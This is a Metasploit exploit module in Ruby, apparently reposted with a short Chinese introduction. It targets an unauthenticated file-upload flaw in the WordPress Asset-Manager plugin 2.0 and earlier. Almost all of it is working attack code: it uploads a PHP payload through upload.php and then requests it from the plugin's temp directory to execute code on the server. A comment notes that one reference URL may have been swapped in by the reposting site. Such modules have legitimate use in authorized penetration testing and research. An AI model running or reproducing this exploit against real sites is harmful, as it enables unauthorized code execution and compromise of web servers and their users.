WordPress Asset-Manager PHP文件上传漏洞

此 Metasploit 模块利用 WordPress Asset-Manager 插件 2.0 及更早版本中的任意文件上传漏洞。插件的 upload.php 在未经身份验证的情况下接受文件上传，攻击者可以将 PHP 文件上传到插件的临时目录（wp-content/uploads/assets/temp/），随后直接通过 GET 请求访问该文件，从而在服务器上执行任意代码。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

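class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module's metadata (name, description, authors, references,
  # payload constraints, targets) and the single TARGETURI option that points
  # at the WordPress installation root.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          # NOTE(review): this URL looks like it was substituted by the site that
          # reposted the module; confirm it against the upstream module source.
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads a PHP payload through the plugin's unauthenticated upload.php and
  # then requests it from the plugin's temp directory so the server runs it.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the upload response is
  #   not a 200 whose body contains the uploaded filename, or when the
  #   execution request returns a non-200 status.
  def exploit
    # Normalize to a trailing slash so the plugin paths below can be appended.
    base = target_uri.path
    base += '/' unless base.end_with?('/')
    peer = "#{rhost}:#{rport}"

    # Random name so repeated runs do not collide; the generated PHP removes its
    # own file once it runs (:unlink_self), limiting what is left on the target.
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload  = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Drop the CRLF Rex emits before the first boundary (request shape kept
    # from the original module).
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{base}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # Plain substring check: the original interpolated payload_name into a
    # regex, where the '.' in '.php' was an unescaped wildcard. to_s guards a
    # nil body.
    unless res && res.code == 200 && res.body.to_s.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{base}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    # A nil response is deliberately not a failure: a payload that keeps the
    # connection open (e.g. a shell) may never return an HTTP response.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end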